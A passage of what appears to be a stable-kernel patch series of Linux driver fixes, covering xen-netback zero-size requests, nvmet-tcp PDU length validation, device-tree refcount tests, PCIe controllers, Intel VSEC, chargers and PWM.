+diff --git a/drivers/net/wireless/realtek/rtlwifi/wifi.h b/drivers/net/wireless/realtek/rtlwifi/wifi.h
+index 31f9e9e5c6804..0bac788ccd6e3 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/wifi.h
++++ b/drivers/net/wireless/realtek/rtlwifi/wifi.h
+@@ -3105,4 +3105,11 @@ static inline struct ieee80211_sta *rtl_find_sta(struct ieee80211_hw *hw,
+ 	return ieee80211_find_sta(mac->vif, mac_addr);
+ }
+ 
++static inline u32 calculate_bit_shift(u32 bitmask)
++{
++	if (WARN_ON_ONCE(!bitmask))
++		return 0;
++
++	return __ffs(bitmask);
++}
+ #endif
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index fabca307867a0..0970d6bcba439 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -266,9 +266,9 @@ static void rtw_ops_configure_filter(struct ieee80211_hw *hw,
+ 
+ 	if (changed_flags & FIF_ALLMULTI) {
+ 		if (*new_flags & FIF_ALLMULTI)
+-			rtwdev->hal.rcr |= BIT_AM | BIT_AB;
++			rtwdev->hal.rcr |= BIT_AM;
+ 		else
+-			rtwdev->hal.rcr &= ~(BIT_AM | BIT_AB);
++			rtwdev->hal.rcr &= ~(BIT_AM);
+ 	}
+ 	if (changed_flags & FIF_FCSFAIL) {
+ 		if (*new_flags & FIF_FCSFAIL)
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index c3a8d78a41a7b..2716040985748 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -463,12 +463,25 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	}
+ 
+ 	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
+-	     shinfo->nr_frags++, gop++, nr_slots--) {
++	     nr_slots--) {
++		if (unlikely(!txp->size)) {
++			unsigned long flags;
++
++			spin_lock_irqsave(&queue->response_lock, flags);
++			make_tx_response(queue, txp, 0, XEN_NETIF_RSP_OKAY);
++			push_tx_responses(queue);
++			spin_unlock_irqrestore(&queue->response_lock, flags);
++			++txp;
++			continue;
++		}
++
+ 		index = pending_index(queue->pending_cons++);
+ 		pending_idx = queue->pending_ring[index];
+ 		xenvif_tx_create_map_op(queue, pending_idx, txp,
+ 				        txp == first ? extra_count : 0, gop);
+ 		frag_set_pending_idx(&frags[shinfo->nr_frags], pending_idx);
++		++shinfo->nr_frags;
++		++gop;
+ 
+ 		if (txp == first)
+ 			txp = txfrags;
+@@ -481,20 +494,39 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		shinfo = skb_shinfo(nskb);
+ 		frags = shinfo->frags;
+ 
+-		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+-		     shinfo->nr_frags++, txp++, gop++) {
++		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots; ++txp) {
++			if (unlikely(!txp->size)) {
++				unsigned long flags;
++
++				spin_lock_irqsave(&queue->response_lock, flags);
++				make_tx_response(queue, txp, 0,
++						 XEN_NETIF_RSP_OKAY);
++				push_tx_responses(queue);
++				spin_unlock_irqrestore(&queue->response_lock,
++						       flags);
++				continue;
++			}
++
+ 			index = pending_index(queue->pending_cons++);
+ 			pending_idx = queue->pending_ring[index];
+ 			xenvif_tx_create_map_op(queue, pending_idx, txp, 0,
+ 						gop);
+ 			frag_set_pending_idx(&frags[shinfo->nr_frags],
+ 					     pending_idx);
++			++shinfo->nr_frags;
++			++gop;
+ 		}
+ 
+-		skb_shinfo(skb)->frag_list = nskb;
+-	} else if (nskb) {
++		if (shinfo->nr_frags) {
++			skb_shinfo(skb)->frag_list = nskb;
++			nskb = NULL;
++		}
++	}
++
++	if (nskb) {
+ 		/* A frag_list skb was allocated but it is no longer needed
+-		 * because enough slots were converted to copy ops above.
++		 * because enough slots were converted to copy ops above or some
++		 * were empty.
+ 		 */
+ 		kfree_skb(nskb);
+ 	}
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 355d80323b836..ce42afe8f64ef 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -18,6 +18,7 @@
+ #include "nvmet.h"
+ 
+ #define NVMET_TCP_DEF_INLINE_DATA_SIZE	(4 * PAGE_SIZE)
++#define NVMET_TCP_MAXH2CDATA		0x400000 /* 16M arbitrary limit */
+ 
+ /* Define the socket priority to use for connections were it is desirable
+  * that the NIC consider performing optimized packet processing or filtering.
+@@ -861,7 +862,7 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 	icresp->hdr.pdo = 0;
+ 	icresp->hdr.plen = cpu_to_le32(icresp->hdr.hlen);
+ 	icresp->pfv = cpu_to_le16(NVME_TCP_PFV_1_0);
+-	icresp->maxdata = cpu_to_le32(0x400000); /* 16M arbitrary limit */
++	icresp->maxdata = cpu_to_le32(NVMET_TCP_MAXH2CDATA);
+ 	icresp->cpda = 0;
+ 	if (queue->hdr_digest)
+ 		icresp->digest |= NVME_TCP_HDR_DIGEST_ENABLE;
+@@ -914,6 +915,7 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
+ {
+ 	struct nvme_tcp_data_pdu *data = &queue->pdu.data;
+ 	struct nvmet_tcp_cmd *cmd;
++	unsigned int exp_data_len;
+ 
+ 	if (likely(queue->nr_cmds)) {
+ 		if (unlikely(data->ttag >= queue->nr_cmds)) {
+@@ -932,12 +934,24 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
+ 			data->ttag, le32_to_cpu(data->data_offset),
+ 			cmd->rbytes_done);
+ 		/* FIXME: use path and transport errors */
+-		nvmet_req_complete(&cmd->req,
+-			NVME_SC_INVALID_FIELD | NVME_SC_DNR);
++		nvmet_tcp_fatal_error(queue);
+ 		return -EPROTO;
+ 	}
+ 
++	exp_data_len = le32_to_cpu(data->hdr.plen) -
++			nvmet_tcp_hdgst_len(queue) -
++			nvmet_tcp_ddgst_len(queue) -
++			sizeof(*data);
++
+ 	cmd->pdu_len = le32_to_cpu(data->data_length);
++	if (unlikely(cmd->pdu_len != exp_data_len ||
++		     cmd->pdu_len == 0 ||
++		     cmd->pdu_len > NVMET_TCP_MAXH2CDATA)) {
++		pr_err("H2CData PDU len %u is invalid\n", cmd->pdu_len);
++		/* FIXME: use proper transport errors */
++		nvmet_tcp_fatal_error(queue);
++		return -EPROTO;
++	}
+ 	cmd->pdu_recv = 0;
+ 	nvmet_tcp_build_pdu_iovec(cmd);
+ 	queue->cmd = cmd;
+diff --git a/drivers/nvme/target/trace.h b/drivers/nvme/target/trace.h
+index 6109b3806b12b..974d99d47f514 100644
+--- a/drivers/nvme/target/trace.h
++++ b/drivers/nvme/target/trace.h
+@@ -53,8 +53,7 @@ static inline void __assign_req_name(char *name, struct nvmet_req *req)
+ 		return;
+ 	}
+ 
+-	strncpy(name, req->ns->device_path,
+-		min_t(size_t, DISK_NAME_LEN, strlen(req->ns->device_path)));
++	strscpy_pad(name, req->ns->device_path, DISK_NAME_LEN);
+ }
+ #endif
+ 
+@@ -85,7 +84,7 @@ TRACE_EVENT(nvmet_req_init,
+ 		__entry->flags = cmd->common.flags;
+ 		__entry->nsid = le32_to_cpu(cmd->common.nsid);
+ 		__entry->metadata = le64_to_cpu(cmd->common.metadata);
+-		memcpy(__entry->cdw10, &cmd->common.cdw10,
++		memcpy(__entry->cdw10, &cmd->common.cdws,
+ 			sizeof(__entry->cdw10));
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, nsid=%u, flags=%#x, "
+diff --git a/drivers/of/base.c b/drivers/of/base.c
+index d5a5c35eba72a..f849bbb9ef8c7 100644
+--- a/drivers/of/base.c
++++ b/drivers/of/base.c
+@@ -1646,6 +1646,7 @@ int of_parse_phandle_with_args_map(const struct device_node *np,
+ 		out_args->np = new;
+ 		of_node_put(cur);
+ 		cur = new;
++		new = NULL;
+ 	}
+ put:
+ 	of_node_put(cur);
+diff --git a/drivers/of/unittest-data/tests-phandle.dtsi b/drivers/of/unittest-data/tests-phandle.dtsi
+index 6b33be4c4416c..aa0d7027ffa68 100644
+--- a/drivers/of/unittest-data/tests-phandle.dtsi
++++ b/drivers/of/unittest-data/tests-phandle.dtsi
+@@ -38,6 +38,13 @@
+ 				phandle-map-pass-thru = <0x0 0xf0>;
+ 			};
+ 
++			provider5: provider5 {
++				#phandle-cells = <2>;
++				phandle-map = <2 7 &provider4 2 3>;
++				phandle-map-mask = <0xff 0xf>;
++				phandle-map-pass-thru = <0x0 0xf0>;
++			};
++
+ 			consumer-a {
+ 				phandle-list =	<&provider1 1>,
+ 						<&provider2 2 0>,
+@@ -64,7 +71,8 @@
+ 						<&provider4 4 0x100>,
+ 						<&provider4 0 0x61>,
+ 						<&provider0>,
+-						<&provider4 19 0x20>;
++						<&provider4 19 0x20>,
++						<&provider5 2 7>;
+ 				phandle-list-bad-phandle = <12345678 0 0>;
+ 				phandle-list-bad-args = <&provider2 1 0>,
+ 							<&provider4 0>;
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index edd2342598e49..e541a8960f1de 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -448,6 +448,9 @@ static void __init of_unittest_parse_phandle_with_args(void)
+ 
+ 		unittest(passed, "index %i - data error on node %pOF rc=%i\n",
+ 			 i, args.np, rc);
++
++		if (rc == 0)
++			of_node_put(args.np);
+ 	}
+ 
+ 	/* Check for missing list property */
+@@ -537,8 +540,9 @@ static void __init of_unittest_parse_phandle_with_args(void)
+ 
+ static void __init of_unittest_parse_phandle_with_args_map(void)
+ {
+-	struct device_node *np, *p0, *p1, *p2, *p3;
++	struct device_node *np, *p[6] = {};
+ 	struct of_phandle_args args;
++	unsigned int prefs[6];
+ 	int i, rc;
+ 
+ 	np = of_find_node_by_path("/testcase-data/phandle-tests/consumer-b");
+@@ -547,34 +551,24 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		return;
+ 	}
+ 
+-	p0 = of_find_node_by_path("/testcase-data/phandle-tests/provider0");
+-	if (!p0) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p1 = of_find_node_by_path("/testcase-data/phandle-tests/provider1");
+-	if (!p1) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p2 = of_find_node_by_path("/testcase-data/phandle-tests/provider2");
+-	if (!p2) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p3 = of_find_node_by_path("/testcase-data/phandle-tests/provider3");
+-	if (!p3) {
+-		pr_err("missing testcase data\n");
+-		return;
++	p[0] = of_find_node_by_path("/testcase-data/phandle-tests/provider0");
++	p[1] = of_find_node_by_path("/testcase-data/phandle-tests/provider1");
++	p[2] = of_find_node_by_path("/testcase-data/phandle-tests/provider2");
++	p[3] = of_find_node_by_path("/testcase-data/phandle-tests/provider3");
++	p[4] = of_find_node_by_path("/testcase-data/phandle-tests/provider4");
++	p[5] = of_find_node_by_path("/testcase-data/phandle-tests/provider5");
++	for (i = 0; i < ARRAY_SIZE(p); ++i) {
++		if (!p[i]) {
++			pr_err("missing testcase data\n");
++			return;
++		}
++		prefs[i] = kref_read(&p[i]->kobj.kref);
+ 	}
+ 
+ 	rc = of_count_phandle_with_args(np, "phandle-list", "#phandle-cells");
+-	unittest(rc == 7, "of_count_phandle_with_args() returned %i, expected 7\n", rc);
++	unittest(rc == 8, "of_count_phandle_with_args() returned %i, expected 8\n", rc);
+ 
+-	for (i = 0; i < 8; i++) {
++	for (i = 0; i < 9; i++) {
+ 		bool passed = true;
+ 
+ 		memset(&args, 0, sizeof(args));
+@@ -585,13 +579,13 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		switch (i) {
+ 		case 0:
+ 			passed &= !rc;
+-			passed &= (args.np == p1);
++			passed &= (args.np == p[1]);
+ 			passed &= (args.args_count == 1);
+ 			passed &= (args.args[0] == 1);
+ 			break;
+ 		case 1:
+ 			passed &= !rc;
+-			passed &= (args.np == p3);
++			passed &= (args.np == p[3]);
+ 			passed &= (args.args_count == 3);
+ 			passed &= (args.args[0] == 2);
+ 			passed &= (args.args[1] == 5);
+@@ -602,28 +596,36 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 			break;
+ 		case 3:
+ 			passed &= !rc;
+-			passed &= (args.np == p0);
++			passed &= (args.np == p[0]);
+ 			passed &= (args.args_count == 0);
+ 			break;
+ 		case 4:
+ 			passed &= !rc;
+-			passed &= (args.np == p1);
++			passed &= (args.np == p[1]);
+ 			passed &= (args.args_count == 1);
+ 			passed &= (args.args[0] == 3);
+ 			break;
+ 		case 5:
+ 			passed &= !rc;
+-			passed &= (args.np == p0);
++			passed &= (args.np == p[0]);
+ 			passed &= (args.args_count == 0);
+ 			break;
+ 		case 6:
+ 			passed &= !rc;
+-			passed &= (args.np == p2);
++			passed &= (args.np == p[2]);
+ 			passed &= (args.args_count == 2);
+ 			passed &= (args.args[0] == 15);
+ 			passed &= (args.args[1] == 0x20);
+ 			break;
+ 		case 7:
++			passed &= !rc;
++			passed &= (args.np == p[3]);
++			passed &= (args.args_count == 3);
++			passed &= (args.args[0] == 2);
++			passed &= (args.args[1] == 5);
++			passed &= (args.args[2] == 3);
++			break;
++		case 8:
+ 			passed &= (rc == -ENOENT);
+ 			break;
+ 		default:
+@@ -632,6 +634,9 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 
+ 		unittest(passed, "index %i - data error on node %s rc=%i\n",
+ 			 i, args.np->full_name, rc);
++
++		if (rc == 0)
++			of_node_put(args.np);
+ 	}
+ 
+ 	/* Check for missing list property */
+@@ -678,6 +683,13 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		   "OF: /testcase-data/phandle-tests/consumer-b: #phandle-cells = 2 found 1");
+ 
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
++
++	for (i = 0; i < ARRAY_SIZE(p); ++i) {
++		unittest(prefs[i] == kref_read(&p[i]->kobj.kref),
++			 "provider%d: expected:%d got:%d\n",
++			 i, prefs[i], kref_read(&p[i]->kobj.kref));
++		of_node_put(p[i]);
++	}
+ }
+ 
+ static void __init of_unittest_property_string(void)
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index d2634dafb68e5..7ecad72cff7e7 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -1219,7 +1219,16 @@ static int ks_pcie_probe(struct platform_device *pdev)
+ 		goto err_link;
+ 	}
+ 
++	/* Obtain references to the PHYs */
++	for (i = 0; i < num_lanes; i++)
++		phy_pm_runtime_get_sync(ks_pcie->phy[i]);
++
+ 	ret = ks_pcie_enable_phy(ks_pcie);
++
++	/* Release references to the PHYs */
++	for (i = 0; i < num_lanes; i++)
++		phy_pm_runtime_put_sync(ks_pcie->phy[i]);
++
+ 	if (ret) {
+ 		dev_err(dev, "failed to enable phy\n");
+ 		goto err_link;
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 83ddb190292e4..59c164b5c64aa 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -600,6 +600,7 @@ int dw_pcie_ep_raise_msix_irq(struct dw_pcie_ep *ep, u8 func_no,
+ 	}
+ 
+ 	aligned_offset = msg_addr & (epc->mem->window.page_size - 1);
++	msg_addr &= ~aligned_offset;
+ 	ret = dw_pcie_ep_map_addr(epc, func_no, 0, ep->msi_mem_phys, msg_addr,
+ 				  epc->mem->window.page_size);
+ 	if (ret)
+diff --git a/drivers/pci/controller/pcie-mediatek-gen3.c b/drivers/pci/controller/pcie-mediatek-gen3.c
+index b8612ce5f4d0c..40c38ca5a42e2 100644
+--- a/drivers/pci/controller/pcie-mediatek-gen3.c
++++ b/drivers/pci/controller/pcie-mediatek-gen3.c
+@@ -245,35 +245,60 @@ static int mtk_pcie_set_trans_table(struct mtk_gen3_pcie *pcie,
+ 				    resource_size_t cpu_addr,
+ 				    resource_size_t pci_addr,
+ 				    resource_size_t size,
+-				    unsigned long type, int num)
++				    unsigned long type, int *num)
+ {
++	resource_size_t remaining = size;
++	resource_size_t table_size;
++	resource_size_t addr_align;
++	const char *range_type;
+ 	void __iomem *table;
+ 	u32 val;
+ 
+-	if (num >= PCIE_MAX_TRANS_TABLES) {
+-		dev_err(pcie->dev, "not enough translate table for addr: %#llx, limited to [%d]\n",
+-			(unsigned long long)cpu_addr, PCIE_MAX_TRANS_TABLES);
+-		return -ENODEV;
+-	}
++	while (remaining && (*num < PCIE_MAX_TRANS_TABLES)) {
++		/* Table size needs to be a power of 2 */
++		table_size = BIT(fls(remaining) - 1);
++
++		if (cpu_addr > 0) {
++			addr_align = BIT(ffs(cpu_addr) - 1);
++			table_size = min(table_size, addr_align);
++		}
++
++		/* Minimum size of translate table is 4KiB */
++		if (table_size < 0x1000) {
++			dev_err(pcie->dev, "illegal table size %#llx\n",
++				(unsigned long long)table_size);
++			return -EINVAL;
++		}
+ 
+-	table = pcie->base + PCIE_TRANS_TABLE_BASE_REG +
+-		num * PCIE_ATR_TLB_SET_OFFSET;
++		table = pcie->base + PCIE_TRANS_TABLE_BASE_REG + *num * PCIE_ATR_TLB_SET_OFFSET;
++		writel_relaxed(lower_32_bits(cpu_addr) | PCIE_ATR_SIZE(fls(table_size) - 1), table);
++		writel_relaxed(upper_32_bits(cpu_addr), table + PCIE_ATR_SRC_ADDR_MSB_OFFSET);
++		writel_relaxed(lower_32_bits(pci_addr), table + PCIE_ATR_TRSL_ADDR_LSB_OFFSET);
++		writel_relaxed(upper_32_bits(pci_addr), table + PCIE_ATR_TRSL_ADDR_MSB_OFFSET);
+ 
+-	writel_relaxed(lower_32_bits(cpu_addr) | PCIE_ATR_SIZE(fls(size) - 1),
+-		       table);
+-	writel_relaxed(upper_32_bits(cpu_addr),
+-		       table + PCIE_ATR_SRC_ADDR_MSB_OFFSET);
+-	writel_relaxed(lower_32_bits(pci_addr),
+-		       table + PCIE_ATR_TRSL_ADDR_LSB_OFFSET);
+-	writel_relaxed(upper_32_bits(pci_addr),
+-		       table + PCIE_ATR_TRSL_ADDR_MSB_OFFSET);
++		if (type == IORESOURCE_IO) {
++			val = PCIE_ATR_TYPE_IO | PCIE_ATR_TLP_TYPE_IO;
++			range_type = "IO";
++		} else {
++			val = PCIE_ATR_TYPE_MEM | PCIE_ATR_TLP_TYPE_MEM;
++			range_type = "MEM";
++		}
+ 
+-	if (type == IORESOURCE_IO)
+-		val = PCIE_ATR_TYPE_IO | PCIE_ATR_TLP_TYPE_IO;
+-	else
+-		val = PCIE_ATR_TYPE_MEM | PCIE_ATR_TLP_TYPE_MEM;
++		writel_relaxed(val, table + PCIE_ATR_TRSL_PARAM_OFFSET);
+ 
+-	writel_relaxed(val, table + PCIE_ATR_TRSL_PARAM_OFFSET);
++		dev_dbg(pcie->dev, "set %s trans window[%d]: cpu_addr = %#llx, pci_addr = %#llx, size = %#llx\n",
++			range_type, *num, (unsigned long long)cpu_addr,
++			(unsigned long long)pci_addr, (unsigned long long)table_size);
++
++		cpu_addr += table_size;
++		pci_addr += table_size;
++		remaining -= table_size;
++		(*num)++;
++	}
++
++	if (remaining)
++		dev_warn(pcie->dev, "not enough translate table for addr: %#llx, limited to [%d]\n",
++			 (unsigned long long)cpu_addr, PCIE_MAX_TRANS_TABLES);
+ 
+ 	return 0;
+ }
+@@ -380,30 +405,20 @@ static int mtk_pcie_startup_port(struct mtk_gen3_pcie *pcie)
+ 		resource_size_t cpu_addr;
+ 		resource_size_t pci_addr;
+ 		resource_size_t size;
+-		const char *range_type;
+ 
+-		if (type == IORESOURCE_IO) {
++		if (type == IORESOURCE_IO)
+ 			cpu_addr = pci_pio_to_address(res->start);
+-			range_type = "IO";
+-		} else if (type == IORESOURCE_MEM) {
++		else if (type == IORESOURCE_MEM)
+ 			cpu_addr = res->start;
+-			range_type = "MEM";
+-		} else {
++		else
+ 			continue;
+-		}
+ 
+ 		pci_addr = res->start - entry->offset;
+ 		size = resource_size(res);
+ 		err = mtk_pcie_set_trans_table(pcie, cpu_addr, pci_addr, size,
+-					       type, table_index);
++					       type, &table_index);
+ 		if (err)
+ 			return err;
+-
+-		dev_dbg(pcie->dev, "set %s trans window[%d]: cpu_addr = %#llx, pci_addr = %#llx, size = %#llx\n",
+-			range_type, table_index, (unsigned long long)cpu_addr,
+-			(unsigned long long)pci_addr, (unsigned long long)size);
+-
+-		table_index++;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/pci/controller/pcie-mediatek.c b/drivers/pci/controller/pcie-mediatek.c
+index ae5ad05ddc1d4..11bdef206d120 100644
+--- a/drivers/pci/controller/pcie-mediatek.c
++++ b/drivers/pci/controller/pcie-mediatek.c
+@@ -617,12 +617,18 @@ static void mtk_pcie_intr_handler(struct irq_desc *desc)
+ 		if (status & MSI_STATUS){
+ 			unsigned long imsi_status;
+ 
++			/*
++			 * The interrupt status can be cleared even if the
++			 * MSI status remains pending. As such, given the
++			 * edge-triggered interrupt type, its status should
++			 * be cleared before being dispatched to the
++			 * handler of the underlying device.
++			 */
++			writel(MSI_STATUS, port->base + PCIE_INT_STATUS);
+ 			while ((imsi_status = readl(port->base + PCIE_IMSI_STATUS))) {
+ 				for_each_set_bit(bit, &imsi_status, MTK_MSI_IRQS_NUM)
+ 					generic_handle_domain_irq(port->inner_domain, bit);
+ 			}
+-			/* Clear MSI interrupt status */
+-			writel(MSI_STATUS, port->base + PCIE_INT_STATUS);
+ 		}
+ 	}
+ 
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index 483bb65651665..40477d1d41b59 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -124,36 +124,60 @@ static void intel_vsec_remove_aux(void *data)
+ 	auxiliary_device_uninit(data);
+ }
+ 
++static DEFINE_MUTEX(vsec_ida_lock);
++
+ static void intel_vsec_dev_release(struct device *dev)
+ {
+ 	struct intel_vsec_device *intel_vsec_dev = dev_to_ivdev(dev);
+ 
++	xa_erase(&auxdev_array, intel_vsec_dev->id);
++
++	mutex_lock(&vsec_ida_lock);
+ 	ida_free(intel_vsec_dev->ida, intel_vsec_dev->auxdev.id);
++	mutex_unlock(&vsec_ida_lock);
++
+ 	kfree(intel_vsec_dev->resource);
+ 	kfree(intel_vsec_dev);
+ }
+ 
+-static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *intel_vsec_dev,
+-			      const char *name)
++int intel_vsec_add_aux(struct pci_dev *pdev, struct device *parent,
++		       struct intel_vsec_device *intel_vsec_dev,
++		       const char *name)
+ {
+ 	struct auxiliary_device *auxdev = &intel_vsec_dev->auxdev;
+ 	int ret, id;
+ 
+-	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
++	ret = xa_alloc(&auxdev_array, &intel_vsec_dev->id, intel_vsec_dev,
++		       PMT_XA_LIMIT, GFP_KERNEL);
+ 	if (ret < 0) {
+ 		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+ 
+-	auxdev->id = ret;
++	mutex_lock(&vsec_ida_lock);
++	id = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
++	mutex_unlock(&vsec_ida_lock);
++	if (id < 0) {
++		xa_erase(&auxdev_array, intel_vsec_dev->id);
++		kfree(intel_vsec_dev->resource);
++		kfree(intel_vsec_dev);
++		return id;
++	}
++
++	if (!parent)
++		parent = &pdev->dev;
++
++	auxdev->id = id;
+ 	auxdev->name = name;
+-	auxdev->dev.parent = &pdev->dev;
++	auxdev->dev.parent = parent;
+ 	auxdev->dev.release = intel_vsec_dev_release;
+ 
+ 	ret = auxiliary_device_init(auxdev);
+ 	if (ret < 0) {
++		mutex_lock(&vsec_ida_lock);
+ 		ida_free(intel_vsec_dev->ida, auxdev->id);
++		mutex_unlock(&vsec_ida_lock);
+ 		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+@@ -165,19 +189,14 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev, intel_vsec_remove_aux,
++	ret = devm_add_action_or_reset(parent, intel_vsec_remove_aux,
+ 				       auxdev);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	/* Add auxdev to list */
+-	ret = xa_alloc(&auxdev_array, &id, intel_vsec_dev, PMT_XA_LIMIT,
+-		       GFP_KERNEL);
+-	if (ret)
+-		return ret;
+-
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(intel_vsec_add_aux, INTEL_VSEC);
+ 
+ static int intel_vsec_add_dev(struct pci_dev *pdev, struct intel_vsec_header *header,
+ 			      struct intel_vsec_platform_info *info)
+@@ -235,7 +254,8 @@ static int intel_vsec_add_dev(struct pci_dev *pdev, struct intel_vsec_header *he
+ 	else
+ 		intel_vsec_dev->ida = &intel_vsec_ida;
+ 
+-	return intel_vsec_add_aux(pdev, intel_vsec_dev, intel_vsec_name(header->id));
++	return intel_vsec_add_aux(pdev, NULL, intel_vsec_dev,
++				  intel_vsec_name(header->id));
+ }
+ 
+ static bool intel_vsec_walk_header(struct pci_dev *pdev,
+diff --git a/drivers/platform/x86/intel/vsec.h b/drivers/platform/x86/intel/vsec.h
+index 3deeb05cf394d..330672588868d 100644
+--- a/drivers/platform/x86/intel/vsec.h
++++ b/drivers/platform/x86/intel/vsec.h
+@@ -38,8 +38,15 @@ struct intel_vsec_device {
+ 	struct ida *ida;
+ 	struct intel_vsec_platform_info *info;
+ 	int num_resources;
++	int id; /* xa */
++	void *priv_data;
++	size_t priv_data_size;
+ };
+ 
++int intel_vsec_add_aux(struct pci_dev *pdev, struct device *parent,
++		       struct intel_vsec_device *intel_vsec_dev,
++		       const char *name);
++
+ static inline struct intel_vsec_device *dev_to_ivdev(struct device *dev)
+ {
+ 	return container_of(dev, struct intel_vsec_device, auxdev.dev);
+diff --git a/drivers/power/supply/bq256xx_charger.c b/drivers/power/supply/bq256xx_charger.c
+index 01ad84fd147c8..686eb8d86e221 100644
+--- a/drivers/power/supply/bq256xx_charger.c
++++ b/drivers/power/supply/bq256xx_charger.c
+@@ -1514,13 +1514,16 @@ static int bq256xx_hw_init(struct bq256xx_device *bq)
+ 			wd_reg_val = i;
+ 			break;
+ 		}
+-		if (bq->watchdog_timer > bq256xx_watchdog_time[i] &&
++		if (i + 1 < BQ256XX_NUM_WD_VAL &&
++		    bq->watchdog_timer > bq256xx_watchdog_time[i] &&
+ 		    bq->watchdog_timer < bq256xx_watchdog_time[i + 1])
+ 			wd_reg_val = i;
+ 	}
+ 	ret = regmap_update_bits(bq->regmap, BQ256XX_CHARGER_CONTROL_1,
+ 				 BQ256XX_WATCHDOG_MASK, wd_reg_val <<
+ 						BQ256XX_WDT_BIT_SHIFT);
++	if (ret)
++		return ret;
+ 
+ 	ret = power_supply_get_battery_info(bq->charger, &bat_info);
+ 	if (ret == -ENOMEM)
+diff --git a/drivers/power/supply/cw2015_battery.c b/drivers/power/supply/cw2015_battery.c
+index 473522b4326ad..9d957cf8edf07 100644
+--- a/drivers/power/supply/cw2015_battery.c
++++ b/drivers/power/supply/cw2015_battery.c
+@@ -491,7 +491,7 @@ static int cw_battery_get_property(struct power_supply *psy,
+ 
+ 	case POWER_SUPPLY_PROP_TIME_TO_EMPTY_NOW:
+ 		if (cw_battery_valid_time_to_empty(cw_bat))
+-			val->intval = cw_bat->time_to_empty;
++			val->intval = cw_bat->time_to_empty * 60;
+ 		else
+ 			val->intval = 0;
+ 		break;
+diff --git a/drivers/pwm/core.c b/drivers/pwm/core.c
+index d333e7422f4a9..9726f96bf7635 100644
+--- a/drivers/pwm/core.c
++++ b/drivers/pwm/core.c
+@@ -171,7 +171,7 @@ of_pwm_single_xlate(struct pwm_chip *pc, const struct of_phandle_args *args)
+ 	pwm->args.period = args->args[0];
+ 	pwm->args.polarity = PWM_POLARITY_NORMAL;
+ 
+-	if (args->args_count == 2 && args->args[2] & PWM_POLARITY_INVERTED)
++	if (args->args_count == 2 && args->args[1] & PWM_POLARITY_INVERTED)
+ 		pwm->args.polarity = PWM_POLARITY_INVERSED;
+ 
+ 	return pwm;
+diff --git a/drivers/pwm/pwm-jz4740.c b/drivers/pwm/pwm-jz4740.c
+index a5fdf97c0d2ec..246499128142c 100644
+--- a/drivers/pwm/pwm-jz4740.c
++++ b/drivers/pwm/pwm-jz4740.c
+@@ -60,9 +60,10 @@ static int jz4740_pwm_request(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	snprintf(name, sizeof(name), "timer%u", pwm->hwpwm);
+ 
+ 	clk = clk_get(chip->dev, name);
+-	if (IS_ERR(clk))
+-		return dev_err_probe(chip->dev, PTR_ERR(clk),
+-				     "Failed to get clock\n");
++	if (IS_ERR(clk)) {
++		dev_err(chip->dev, "error %pe: Failed to get clock\n", clk);
++		return PTR_ERR(clk);
++	}
+ 
+ 	err = clk_prepare_enable(clk);
+ 	if (err < 0) {
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index 794ca5b029681..bdcdb7f38312b 100644
